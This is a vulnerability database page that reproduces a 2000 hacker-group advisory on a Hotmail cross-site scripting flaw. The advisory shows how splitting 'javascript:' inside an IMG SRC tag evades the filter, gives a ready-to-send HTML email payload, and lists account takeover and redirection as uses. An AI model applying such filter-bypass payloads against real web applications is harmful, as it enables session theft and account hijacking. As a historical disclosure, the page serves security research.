Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

hack-hm-1.1.txt

🗓️ 11 May 2000 00:00:00Reported by Hawaiian SupermanType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 25 Views

Security flaws in Microsoft Hotmail expose all users to risks, especially concerning Javascript usage.

Code
`####################[Title]####################  
Hotmail Security Alert (Hack HM1.1)! 5/10/2000  
By: Da Hawaiian HaXorS  
"Give back da aina!"  
  
####################[Disclaimer]####################  
In no event shall Da Hawaiian HaXorS be held liable for any special, indirect   
or   
consequential damages or any damages whatsoever resulting from loss of use,  
  
data or profits, whether in an action of contract, negligence or other   
action, arising out of or in connection with the use or performance   
of this information.  
  
In Short, we take no responsibility for the information within this document.   
The information contained within is our sole opinion and not the responsibility   
or opinion of any party we are affiliated with. Whatever anyone does with   
this information is entirely of their own accord.  
  
Lastly, anyone currently employed by any county, state, or federal law enforcement  
agency is not allow to posses or read this material by command of the authors.   
This is for the security community, not for legislative muscle. So DELETE   
IT FOOL!  
end rant.  
  
####################[Introduction]####################  
This document for written to bring attention to security flaws within the   
Microsoft Hotmail email system. As we have seen dozens of times  
before, javascript poses a security danger to web applications, especially   
when  
not properly protected.  
  
####################[Scope]####################  
The scope of this problem will most likely affect any and all browsers that  
have javascript turned on by default. Now lets see here....  
  
That covers all major operating systems. (Windows, MacOS, *nix)  
and covers both major browsers. (Internet Explorer 3,4,5 and Netscape 2,  
3,4 and 5!?)  
  
So we can safely assume everyone who currently uses Hotmail is at risk regardless   
of   
their current software. Unless there are a few die-hards who use lynx to   
check  
thier hotmail account.   
  
  
####################[Detailed Exploit]####################  
The following line will execute a line of JavaScript Code. This  
browser feature has been well documented elsewhere.  
  
<IMG SRC="javascript:alert('GameOver, Hax0rs win!');"> /* Example, not   
actual exploit */  
  
<IMG SRC="javasc  
ript:alert('test');">  
Delimiting the string with some HTML Ascii Code Entities will also still   
execute.  
\09 \10 \11 \12 \13 as delimiters all work.  
  
/* Actual Exploit */  
<IMG SRC="javasc ript:alert('test');">  
  
  
For the script kiddy: (You must send the mail as HTML mail).  
  
MIME-Version: 1.0  
From: Script Kiddy <[email protected]>  
Content-Type: text/html; charset=us-ascii  
Content-Transfer-Encoding: 7bit  
Subject: The Script Kiddy Has You OWNED!  
  
<HTML><BODY>  
<IMG SRC="javasc ript:alert('test');">  
</BODY></HTML>  
>.  
  
/* J0l0S2h8fj8i0Ce2ahe027 */  
  
####################[Potential Disasters]####################  
The limit to the disastrous consequences of this are limited only to the   
skill  
and creativity of intruder. So, lets give some examples shall we:  
  
1) Hotmail Account take over. Yes, attacker can gain both username and password  
or whatever Hotmail uses to track the session. Not like it matters.  
  
2) Use exploit in conjunction with a KNOWN browser exploits to access the   
system.  
Hmm. I wonder if JS can be used to exploit an IE security bug, writing a   
file  
to the system (Can you say "I LOVE YOU"?), and then execute that file. Seems   
possible.  
  
3) Re-Direct the user to somewhere else they want.   
Wow, wouldn't spammers just love to be able to re-direct a massive amount   
of  
Hotmail users to some Pr0n site. HAH!  
  
Remember, limited only in creativity.  
  
####################[Suggested Fix]####################  
The silver bullet fix would be that Microsoft would take security and the  
privacy of its customers seriously with a proactive approach rather than   
deny  
and post a patch approach.  
  
However, given that is an unreasonable request, we suggest the following:  
Removethe ALL carriage returns from string before analyzing it.  
  
  
  
IMPORTANT NOTICE: If you are not using HushMail, this message could have been read easily by the many people who have access to your open personal email messages.  
Get your FREE, totally secure email address at http://www.hushmail.com.  
  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
11 May 2000 00:00Current
7.4High risk
Vulners AI Score7.4
hotmail security alertsecurity flawsmicrosoft hotmailjavascript risksemail system vulnerabilityuser risks.
25